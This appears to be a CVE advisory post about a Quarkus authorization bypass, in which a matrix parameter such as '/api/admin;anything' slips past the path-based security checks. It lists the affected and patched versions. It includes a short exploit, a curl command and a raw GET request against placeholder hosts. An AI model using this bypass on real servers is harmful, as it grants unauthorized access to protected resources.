Quarkus, Authorization Bypass, CVE-GHSL-2026-099 (High)

By /

Listen to this Post

The vulnerability arises from an inconsistency in how Quarkus handles HTTP matrix parameters (semicolons). The security layer performs authorization checks using the raw, unaltered request URI, which fully preserves matrix parameters like /api/admin;something. However, the RESTEasy Reactive routing layer strips these matrix parameters before matching the request to an endpoint. Consequently, a request to `/api/admin;anything` bypasses the security policy intended for `/api/admin` because the security layer evaluates the path with the matrix parameter, while the router sees only the base path `/api/admin` and invokes the protected method. This path‑normalization discrepancy allows unauthenticated or low‑privileged attackers to gain unauthorized access to protected resources. The issue was discovered using the GitHub Security Lab Taskflow Agent and manually verified. Quarkus versions prior to 3.20.6.1, those in the ranges 3.21.0 up to 3.27.3.1, 3.30.0 up to 3.33.1.1, and 3.34.0 up to 3.35.1.1 are affected, with version 3.32.4 specifically confirmed vulnerable. The problem is fixed in releases 3.20.6.1, 3.27.3.1, 3.33.1.1, and 3.35.1.1.

DailyCVE Form

Platform: Quarkus
Version: 3.32.4
Vulnerability: Authorization Bypass
Severity: High
date: May 4,2026

Prediction: May 4,2026

Analytics (What Undercode Say)

Check for vulnerable Quarkus version
./mvnw quarkus:info | grep "version"
Exploit example (curl command)
curl -k "https://target.com/api/admin;evil"
Simulate the security layer vs. router mismatch
echo "Security layer sees: /api/admin;evil"
echo "Router sees: /api/admin"

Exploit

GET /api/admin;anything HTTP/1.1
Host: vulnerable-quarkus.com
Authorization: (none or low-privilege token)

The request reaches the protected `/api/admin` endpoint because the router strips ;anything, while the security layer never enforces the policy.

Protection from this CVE

Upgrade to any of the patched versions:

  • 3.20.6.1
  • 3.27.3.1
  • 3.33.1.1
  • 3.35.1.1

Impact

Unauthenticated or low-privileged users can bypass HTTP path-based authorization, gaining unauthorized access to protected endpoints.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top